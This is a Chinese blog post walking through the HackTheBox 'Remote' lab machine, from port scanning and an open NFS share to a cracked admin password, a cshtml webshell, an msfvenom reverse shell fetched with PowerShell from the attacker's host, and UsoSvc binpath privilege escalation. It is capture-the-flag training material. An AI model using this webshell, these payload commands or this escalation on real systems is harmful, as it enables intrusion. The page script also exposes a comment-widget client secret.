<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.8.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>HackTheBox Remote walkthrough - P1ay2win&#39;s blog</title>
<meta name="twitter:card" content="summary_large_image">
<meta property="og:site_name" content="P1ay2win's blog">
<meta property="og:type" content="website">
<meta property="og:title" content="HackTheBox Remote walkthrough | P1ay2win's blog">
<meta property="og:image" content="https://blog.play2win.top/2020/08/09/HackTheBox_Remote_walkthrough//images/hackthebox-remote-machine-info.png">
<meta property="twitter:image" content="https://blog.play2win.top/2020/08/09/HackTheBox_Remote_walkthrough//images/hackthebox-remote-machine-info.png">






<link rel="alternative" href="/atom.xml" title="HackTheBox Remote walkthrough" type="application/atom+xml">



<link rel="icon" href="/images/header.png">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">

</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/header.png" alt="HackTheBox Remote walkthrough" height="28">
                P1ay2win&#39;s blog
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>

    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main">
<div class="card">
    
    <div class="card-image">
        <span  class="image is-7by1">
            <img class="thumbnail" src="/images/hackthebox-remote-machine-info.png" alt="HackTheBox Remote walkthrough">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2020-08-09T14:55:27.000Z">2020-08-09</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/靶机/">靶机</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    4 分钟 读完 (大约 663 个字)
                </span>
                
                
                    <i class="fa fa-eye"></i> <span id="busuanzi_value_page_pv"></span>次阅读
                
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                HackTheBox Remote walkthrough
            
        </h1>
        <div class="content">
            <p>…</p>
<a id="more"></a>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>扫描靶机开放端口，值得注意的是开放了ftp、http和共享文件服务。</p>
<figure class="highlight bash hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A 10.10.10.180</span><br></pre></td></tr></table></figure>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 194317.png" style="width:100%;"></p>
<p>ftp服务允许匿名登录，但是里面没用东西。</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 212107.png" style="width:100%;"></p>
<p>http上的网站，通过搜索底部的关键词发现是开源的asp.net的CMS，最近一个漏洞是后台RCE。</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 212722.png" style="width:100%;"></p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 214607.png" style="width:100%;"></p>
<p>访问共享文件访问，有一个文件夹任何人都能访问，挂载到本地发现是网站的源码。</p>
<figure class="highlight bash hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">showmount -e 10.10.10.180</span><br><span class="line">sudo mount 10.10.10.180:/site_backups site_backups</span><br></pre></td></tr></table></figure>
<p>&lt;img src=”捕获.JPG)</p>
<h2 id="GETSHELL"><a href="#GETSHELL" class="headerlink" title="GETSHELL"></a>GETSHELL</h2><p>在源码的web.config里发现<code>machineKey</code>，但是前台好像没用到asp.net的控件，所以没派上用场。</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 225407.png" style="width:100%;"></p>
<p>接着又在App_Data文件夹里发现了Sql Server的数据库文件，在里面发现管理员密码的hash，拿去网上碰撞得到密码。</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 225842.png" style="width:100%;"></p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-06 230041.png" style="width:100%;"></p>
<p>使用账户<a href="mailto:`admin@htb.local" target="_blank" rel="noopener">`admin@htb.local</a><code>密码</code>baconandcheese`在<a href="http://10.10.10.180/umbraco/处登录到后台。翻看下功能，发现个创建cshtml模板的地方，遂上个cshtml的webshell。" target="_blank" rel="noopener">http://10.10.10.180/umbraco/处登录到后台。翻看下功能，发现个创建cshtml模板的地方，遂上个cshtml的webshell。</a></p>
<figure class="highlight c# hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">@<span class="hljs-keyword">using</span> System.Diagnostics;</span><br><span class="line">@<span class="hljs-keyword">using</span> System.IO;</span><br><span class="line">@functions &#123;</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">string</span> <span class="hljs-title">ExecuteCommand</span>(<span class="hljs-params"><span class="hljs-keyword">string</span> command</span>)</span></span><br><span class="line"><span class="hljs-function"></span>    &#123;</span><br><span class="line">        <span class="hljs-keyword">try</span></span><br><span class="line">        &#123;</span><br><span class="line">            ProcessStartInfo processStartInfo = <span class="hljs-keyword">new</span> ProcessStartInfo();</span><br><span class="line">            processStartInfo.FileName = <span class="hljs-string">"cmd.exe"</span>;</span><br><span class="line">            processStartInfo.Arguments = <span class="hljs-string">"/c "</span> + command;</span><br><span class="line">            processStartInfo.RedirectStandardOutput = <span class="hljs-literal">true</span>;</span><br><span class="line">            processStartInfo.UseShellExecute = <span class="hljs-literal">false</span>;</span><br><span class="line">            Process process = Process.Start(processStartInfo);</span><br><span class="line">            <span class="hljs-keyword">using</span> (StreamReader streamReader = process.StandardOutput)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="hljs-keyword">string</span> ret = streamReader.ReadToEnd();</span><br><span class="line">                <span class="hljs-keyword">return</span> ret;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="hljs-keyword">catch</span> (Exception ex)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="hljs-keyword">return</span> ex.ToString();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">@&#123;</span><br><span class="line">    <span class="hljs-keyword">if</span> (Request.QueryString[<span class="hljs-string">"p1ay2win"</span>] != <span class="hljs-literal">null</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        @ExecuteCommand(Request.QueryString[<span class="hljs-string">"p1ay2win"</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-07 103333.png" style="width:100%;"></p>
<p>获得第一个flag。</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-07 102838.png" style="width:100%;"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>用msfvemon生产一个meterpreter的反弹shell，在本机上起一个http服务，通过powershell上传反弹shell和PowerUp提权检测脚本。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter_reverse_http lhost=10.10.x.x lport=9001 -f exe -o re.exe</span><br><span class="line">python -m SimpleHTTPServer</span><br><span class="line">powershell (new-object System.Net.WebClient).DownloadFile( &apos;http://10.10.X.X:8000/re.exe&apos;,&apos;c:\inetpub\wwwroot\views\re.exe&apos;)</span><br><span class="line">powershell (new-object System.Net.WebClient).DownloadFile( &apos;http://10.10.X.X:8000/PowerUp.ps1&apos;,&apos;c:\inetpub\wwwroot\views\PowerUp.ps1&apos;)</span><br></pre></td></tr></table></figure>
<p>在靶机运行反弹shell，用反弹shell的session开启一个交互的shell，运行PowerUp的invoke-allchecks功能，发现可修改UsoSvc的binpath提权。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -c &quot;import-module c:\inetpub\wwwroot\views\PowerUp.ps1;invoke-allchecks&quot;</span><br></pre></td></tr></table></figure>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-07 112948.png" style="width:100%;"></p>
<p>修改UsoSvc的binpath，在重新启动这个程序的时候就能执行binpath的命令。</p>
<figure class="highlight cmd hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sc config UsoSvc binpath="c:\inetpub\wwwroot\views\re.exe"</span><br><span class="line">sc stop UscSvc</span><br><span class="line">sc <span class="hljs-built_in">start</span> UscSvc</span><br></pre></td></tr></table></figure>
<p>当时提权的时候发现个问题，binpath的命令运行一段时间就会被kill掉，找了下命令用<code>cmd /c</code>开头就在不被kill。</p>
<figure class="highlight bash hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc config UsoSvc binpath=<span class="hljs-string">"cmd /c c:\inetpub\wwwroot\views\re.exe"</span></span><br></pre></td></tr></table></figure>
<p>改了binpath后，start这个usosvc服务会出现failed字样，这是正常现象，命令还是会被运行。</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-07 140128.png" style="width:100%;"></p>
<p>最后，会得到一个system权限的session。没图…复现时候试了几天又reset死活登录不上…</p>
<p><img src="/2020/08/09/HackTheBox_Remote_walkthrough/屏幕截图 2020-08-09 223656.png" style="width:100%;"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>hackthebox有不用下载和有windows靶机的好处，但是就是速度慢、环境经常有问题，难搞哦。</p>

        </div>
        
            <ul class="post-copyright">
            <li><strong>本文标题：</strong><a href="https://blog.play2win.top/2020/08/09/HackTheBox_Remote_walkthrough/">HackTheBox Remote walkthrough</a></li>
            <li><strong>本文作者：</strong><a href="https://blog.play2win.top">P1ay2win</a></li>
            <li><strong>本文链接：</strong><a href="https://blog.play2win.top/2020/08/09/HackTheBox_Remote_walkthrough/">https://blog.play2win.top/2020/08/09/HackTheBox_Remote_walkthrough/</a></li>
            <li><strong>发布时间：</strong>2020-08-09</li>
            <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
            </li>
            </ul>
        
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/hackthebox/">hackthebox</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2020/08/10/记一次梦里的后渗透/">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">记一次梦里的后渗透</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2020/06/28/GlasgowSmile_walkthrough/">
                <span class="level-item">GlasgowSmile walkthrought</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="comment-container"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css">
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script>
<script>
    var gitalk = new Gitalk({
        clientID: '372fb49f2243341bf93b',
        clientSecret: 'b79da9cd60cecc3af662428f1daa6e01b1702d75',
        id: '12ef23c60bfaf05b8722b4e534d384cd',
        repo: 'p1ay2win.github.io',
        owner: 'p1ay2win',
        admin: "p1ay2win",
        createIssueManually: false,
        distractionFreeMode: false
    })
    gitalk.render('comment-container')
</script>


    </div>
</div>

</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left ">
    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="is-rounded" src="/images/header.png" alt="p1ay2win">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        p1ay2win
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        他们的爱与风华，只问自由，只问盛放，只问深情，只问初心，只问勇敢，无问西东。
                    </p>
                    
                    
                    <p class="is-size-6 is-flex is-flex-center has-text-grey">
                        <i class="fas fa-map-marker-alt has-mr-7"></i>
                        <span>CN</span>
                    </p>
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <p class="title has-text-weight-normal">
                        35
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <p class="title has-text-weight-normal">
                        7
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <p class="title has-text-weight-normal">
                        31
                    </p>
                </div>
            </div>
        </nav>
        
        <div class="level">
            <a class="level-item button is-link is-rounded" href="https://p1ay2win.github.io" target="_blank">
                关注我</a>
        </div>
        
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Github" href="https://github.com/P1ay2win/">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Twitter" href="https://twitter.com/p1ay2win">
                
                <i class="fab fa-twitter"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="RSS" href="/atom.xml">
                
                <i class="fas fa-rss"></i>
                
            </a>
            
        </div>
        
    </div>
</div>

    
        

    <div class="card widget column-left is-sticky" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    目录
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#信息收集">
        <span class="has-mr-6">1</span>
        <span>信息收集</span>
        </a></li><li>
        <a class="is-flex" href="#GETSHELL">
        <span class="has-mr-6">2</span>
        <span>GETSHELL</span>
        </a></li><li>
        <a class="is-flex" href="#提权">
        <span class="has-mr-6">3</span>
        <span>提权</span>
        </a></li><li>
        <a class="is-flex" href="#后记">
        <span class="has-mr-6">4</span>
        <span>后记</span>
        </a></li></ul>
            </div>
        </div>
    </div>


    
    
        <div class="column-right-shadow is-hidden-widescreen ">
        
        </div>
    
</div>


                

            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    P1ay2win&#39;s blog
                
                </a>
                <p class="is-size-7">
                &copy; 2022 P1ay2win&nbsp;
                <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>访问量<span id="busuanzi_value_site_pv"></span>次  <i class="fa fa-user-md"></i>  访客数<span id="busuanzi_value_site_uv"></span>人<br>
                Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://p1ay2win.github.io">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
<script src="/js/animation.js"></script>

    
    
<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>

    
    
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>

    
    <script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>
    
    
<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>

    
    
    
    
    
    
    
    
    
    
    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>
